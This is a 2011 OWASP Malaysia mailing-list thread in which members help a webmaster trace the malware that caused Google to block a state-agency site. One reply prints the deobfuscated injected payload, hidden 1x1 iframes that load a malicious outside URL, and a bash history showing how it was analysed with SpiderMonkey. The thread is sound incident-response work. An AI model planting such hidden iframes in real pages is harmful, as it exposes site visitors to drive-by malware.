[Owasp-Malaysia] Malware Detected!

Sharuzzaman Ahmat Raslan sharuzzaman at gmail.com
Tue Feb 8 20:45:27 EST 2011


Please check how the line got injected into your system.

You need to find the source of the problem to make sure it will not happen
again.



On Wed, Feb 9, 2011 at 6:53 AM, Mohd Syamsuri <msyamsuri at gmail.com> wrote:

> Mr Adnan thanks for the info and guide..
>
> I have clean all the mess and the site is up and running again..
>
> thanks to all too..
>
> ** I will blog this so others can make it as a guide...
>
>
> On Tue, Feb 8, 2011 at 6:00 PM, Adnan bin Mohd Shukor <
> adnan.shukor at gmail.com> wrote:
>
>> mamp <= LOL typo.. it should be nano
>> js <= one of hte binary in Spidermonkey. get the patched version
>> http://blog.didierstevens.com/programs/spidermonkey/ and if you are
>> working on MacOS/Darwin, apply this patch
>>
>> http://blog.xanda.org/2010/10/15/fix-for-spidermonkey-build-issue-in-darwin/
>>
>> thanks
>>
>> On 8 February 2011 17:56, Sharuzzaman Ahmat Raslan
>> <sharuzzaman at gmail.com> wrote:
>> > I can see 2 interesting apps/scripts:
>> >
>> > 1. mamp
>> > 2. /opt/analysis/js/js
>> >
>> > care to share? hopefully it is open source ;)
>> >
>> >
>> > On Tue, Feb 8, 2011 at 5:50 PM, Adnan bin Mohd Shukor
>> > <adnan.shukor at gmail.com> wrote:
>> >>
>> >> Here is my bash history:
>> >>
>> >> xanda:tmp adnan$ history
>> >> <snip>
>> >>  500  cd /tmp
>> >>  501  wget http:/www2.pkink.gov.my/indexsedc.php
>> >>  502  wget http://www2.pkink.gov.my/indexsedc.php
>> >>  503  nano indexsedc.php
>> >>  504  wget http://www2.pkink.gov.my/indexsedc.php
>> >>  505  mamp indexsedc.php.1
>> >>  506  nano indexsedc.php.1
>> >>  507  wget http://www2.pkink.gov.my/sedc.php
>> >>  508  nano sedc.php
>> >>  509  wget http://www2.pkink.gov.my/default.php
>> >>  510  nano default.php
>> >>  511  nano default.php
>> >>  512  clear
>> >> <I've remove tags and leave clean JavaScript inside>
>> >>  513  mv default.php default.txt
>> >>  514  /opt/analysis/js/js < default.txt
>> >>  515  cat write.log
>> >>  516  history
>> >> xanda:tmp adnan$
>> >>
>> >> Below is the output of the cat:
>> >> [output]
>> >> xanda:tmp adnan$ cat write.log
>> >> <iframe width="1" height="1"
>> >>
>> >> src="http://asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==
>> "></iframe>"<iframe
>> >> width="1" height="1"
>> >>
>> >> src="http://asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==
>> "></iframe>"
>> >> [/output]
>> >>
>> >>
>> >> Hint: you might use modified version of spidermonkey to 'understand'
>> >> the javascript
>> >>
>> >> Thanks
>> >>
>> >> On 8 February 2011 17:38, Mohd Syamsuri <msyamsuri at gmail.com> wrote:
>> >> > thanks for the info..
>> >> > i will check all the file.
>> >> >
>> >> > how you found it?
>> >> >
>> >> > On Tue, Feb 8, 2011 at 5:21 PM, Adnan bin Mohd Shukor
>> >> > <adnan.shukor at gmail.com> wrote:
>> >> >>
>> >> >> Here is the flow:
>> >> >>
>> >> >> 1) your indexsedc.php has an iframe to sedc.php
>> >> >> 2) and your sedc.php has an iframe to default.php
>> >> >> 3) and in default.php (look at the last 2 lines), javascript will
>> >> >> actually create an iframe to
>> >> >> asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==
>> >> >>
>> >> >> thanks :)
>> >> >>
>> >> >> On 8 February 2011 17:07, Mohd Syamsuri <msyamsuri at gmail.com>
>> wrote:
>> >> >> > can you point...
>> >> >> > my index.htm or indexsedc.php or other file?
>> >> >> >
>> >> >> > On Tue, Feb 8, 2011 at 4:19 PM, Adnan bin Mohd Shukor
>> >> >> > <adnan.shukor at gmail.com> wrote:
>> >> >> >>
>> >> >> >> you have iframe pointed to
>> >> >> >> asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==
>> >> >> >>
>> >> >> >> which is not xss :)
>> >> >> >>
>> >> >> >> >From my personal point of view, its either caused by:
>> >> >> >> 1) malware on pc which has been used for ftp/access to the server
>> >> >> >> 2) compromised server
>> >> >> >>
>> >> >> >> you can send your access.log to cyber999 at cybersecurity.my or
>> >> >> >> mycert at mycert.org.my for further analysis :)
>> >> >> >>
>> >> >> >> thanks
>> >> >> >>
>> >> >> >> On 8 February 2011 16:00, Mohd Syamsuri <msyamsuri at gmail.com>
>> wrote:
>> >> >> >> > I have check it.
>> >> >> >> > On Tue, Feb 8, 2011 at 3:49 PM, Rasta Boy <rastaboyz at gmail.com
>> >
>> >> >> >> > wrote:
>> >> >> >> >>
>> >> >> >> >> Hi Mohd Symsuri,
>> >> >> >> >>
>> >> >> >> >> Why dont you check on the reason why its being blocked, it
>> might
>> >> >> >> >> help.
>> >> >> >> >>
>> >> >> >> >>
>> >> >> >> >>
>> >> >> >> >>
>> >> >> >> >>
>> >> >> >> >>
>> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=http://www.pkink.gov.my/
>> >> >> >> >>
>> >> >> >> >>
>> >> >> >> >>
>> >> >> >> >>
>> >> >> >> >>
>> >> >> >> >>
>> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=AS:4788
>> >> >> >> >>
>> >> >> >> >> Regards,
>> >> >> >> >> Kishur
>> >> >> >> >>
>> >> >> >> >>
>> >> >> >> >>
>> >> >> >> >> On Tue, Feb 8, 2011 at 3:19 PM, Mohd Syamsuri
>> >> >> >> >> <msyamsuri at gmail.com>
>> >> >> >> >> wrote:
>> >> >> >> >>>
>> >> >> >> >>> Assalamualikum and Good day for my fellow friends.
>> >> >> >> >>> I need some advise.
>> >> >> >> >>> Web site Perbadanan kemajuan Iktisad Negeri Kelantan
>> >> >> >> >>> (http://www.pkink.gov.my) have been blocked by Google for
>> almost
>> >> >> >> >>> 4
>> >> >> >> >>> days.
>> >> >> >> >>> It said that we host malware on our server Malware Detected!
>> (
>> >> >> >> >>> Google
>> >> >> >> >>> said that!!)
>> >> >> >> >>> What i did is..
>> >> >> >> >>> 1. Scan all the data and upload a new data
>> >> >> >> >>> 2. Check the index.html or index.php
>> >> >> >> >>> 3. Scan using web scanner using
>> >> >> >> >>> http://www.avgthreatlabs.com/
>> >> >> >> >>> http://www.virustotal.com
>> >> >> >> >>> but still get block..
>> >> >> >> >>> Googel said Suspected injected code
>> >> >> >> >>> <FRAME SRC="http://www2.pkink.gov.my/indexsedc.php"
>> >> >> >> >>> NAME="confcontent"
>> >> >> >> >>> scrolling=yes >
>> >> >> >> >>> I have using this code for almost 2 years
>> >> >> >> >>> What should i do now?
>> >> >> >> >>>
>> >> >> >> >>> --
>> >> >> >> >>> best regard
>> >> >> >> >>> syamsuri
>> >> >> >> >>>
>> >> >> >> >>>
>> >> >> >> >>>
>> >> >> >> >>> _______________________________________________
>> >> >> >> >>> Owasp-Malaysia mailing list
>> >> >> >> >>> Owasp-Malaysia at lists.owasp.org
>> >> >> >> >>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>> >> >> >> >>>
>> >> >> >> >>> OWASP Malaysia Wiki
>> >> >> >> >>> http://www.owasp.org/index.php/Malaysia
>> >> >> >> >>>
>> >> >> >> >>> OWASP Malaysia Wiki Facebook
>> >> >> >> >>>
>> >> >> >> >>>
>> >> >> >> >>>
>> >> >> >> >>>
>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>> >> >> >> >>
>> >> >> >> >>
>> >> >> >> >> _______________________________________________
>> >> >> >> >> Owasp-Malaysia mailing list
>> >> >> >> >> Owasp-Malaysia at lists.owasp.org
>> >> >> >> >> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>> >> >> >> >>
>> >> >> >> >> OWASP Malaysia Wiki
>> >> >> >> >> http://www.owasp.org/index.php/Malaysia
>> >> >> >> >>
>> >> >> >> >> OWASP Malaysia Wiki Facebook
>> >> >> >> >>
>> >> >> >> >>
>> >> >> >> >>
>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>> >> >> >> >
>> >> >> >> >
>> >> >> >> >
>> >> >> >> > --
>> >> >> >> > best regard
>> >> >> >> > syamsuri
>> >> >> >> >
>> >> >> >> >
>> >> >> >> >
>> >> >> >> > _______________________________________________
>> >> >> >> > Owasp-Malaysia mailing list
>> >> >> >> > Owasp-Malaysia at lists.owasp.org
>> >> >> >> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>> >> >> >> >
>> >> >> >> > OWASP Malaysia Wiki
>> >> >> >> > http://www.owasp.org/index.php/Malaysia
>> >> >> >> >
>> >> >> >> > OWASP Malaysia Wiki Facebook
>> >> >> >> >
>> >> >> >> >
>> >> >> >> >
>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>> >> >> >> >
>> >> >> >> _______________________________________________
>> >> >> >> Owasp-Malaysia mailing list
>> >> >> >> Owasp-Malaysia at lists.owasp.org
>> >> >> >> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>> >> >> >>
>> >> >> >> OWASP Malaysia Wiki
>> >> >> >> http://www.owasp.org/index.php/Malaysia
>> >> >> >>
>> >> >> >> OWASP Malaysia Wiki Facebook
>> >> >> >>
>> >> >> >>
>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>> >> >> >
>> >> >> >
>> >> >> >
>> >> >> > --
>> >> >> > best regard
>> >> >> > syamsuri
>> >> >> >
>> >> >> >
>> >> >> >
>> >> >> > _______________________________________________
>> >> >> > Owasp-Malaysia mailing list
>> >> >> > Owasp-Malaysia at lists.owasp.org
>> >> >> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>> >> >> >
>> >> >> > OWASP Malaysia Wiki
>> >> >> > http://www.owasp.org/index.php/Malaysia
>> >> >> >
>> >> >> > OWASP Malaysia Wiki Facebook
>> >> >> >
>> >> >> >
>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>> >> >> >
>> >> >> _______________________________________________
>> >> >> Owasp-Malaysia mailing list
>> >> >> Owasp-Malaysia at lists.owasp.org
>> >> >> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>> >> >>
>> >> >> OWASP Malaysia Wiki
>> >> >> http://www.owasp.org/index.php/Malaysia
>> >> >>
>> >> >> OWASP Malaysia Wiki Facebook
>> >> >>
>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>> >> >
>> >> >
>> >> >
>> >> > --
>> >> > best regard
>> >> > syamsuri
>> >> >
>> >> >
>> >> >
>> >> > _______________________________________________
>> >> > Owasp-Malaysia mailing list
>> >> > Owasp-Malaysia at lists.owasp.org
>> >> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>> >> >
>> >> > OWASP Malaysia Wiki
>> >> > http://www.owasp.org/index.php/Malaysia
>> >> >
>> >> > OWASP Malaysia Wiki Facebook
>> >> >
>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>> >> >
>> >> _______________________________________________
>> >> Owasp-Malaysia mailing list
>> >> Owasp-Malaysia at lists.owasp.org
>> >> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>> >>
>> >> OWASP Malaysia Wiki
>> >> http://www.owasp.org/index.php/Malaysia
>> >>
>> >> OWASP Malaysia Wiki Facebook
>> >>
>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>> >
>> >
>> >
>> > --
>> > Sharuzzaman Ahmat Raslan
>> >
>> > _______________________________________________
>> > Owasp-Malaysia mailing list
>> > Owasp-Malaysia at lists.owasp.org
>> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>> >
>> > OWASP Malaysia Wiki
>> > http://www.owasp.org/index.php/Malaysia
>> >
>> > OWASP Malaysia Wiki Facebook
>> > http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>> >
>> _______________________________________________
>> Owasp-Malaysia mailing list
>> Owasp-Malaysia at lists.owasp.org
>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>>
>> OWASP Malaysia Wiki
>> http://www.owasp.org/index.php/Malaysia
>>
>> OWASP Malaysia Wiki Facebook
>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>>
>
>
>
> --
> best regard
> syamsuri
>
>
>
> _______________________________________________
> Owasp-Malaysia mailing list
> Owasp-Malaysia at lists.owasp.org
> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>
> OWASP Malaysia Wiki
> http://www.owasp.org/index.php/Malaysia
>
> OWASP Malaysia Wiki Facebook
> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>



-- 
Sharuzzaman Ahmat Raslan
-------------- next part --------------
An HTML attachment was scrubbed...
URL: https://lists.owasp.org/pipermail/owasp-malaysia/attachments/20110209/57a4a8ed/attachment-0001.html 


More information about the Owasp-Malaysia mailing list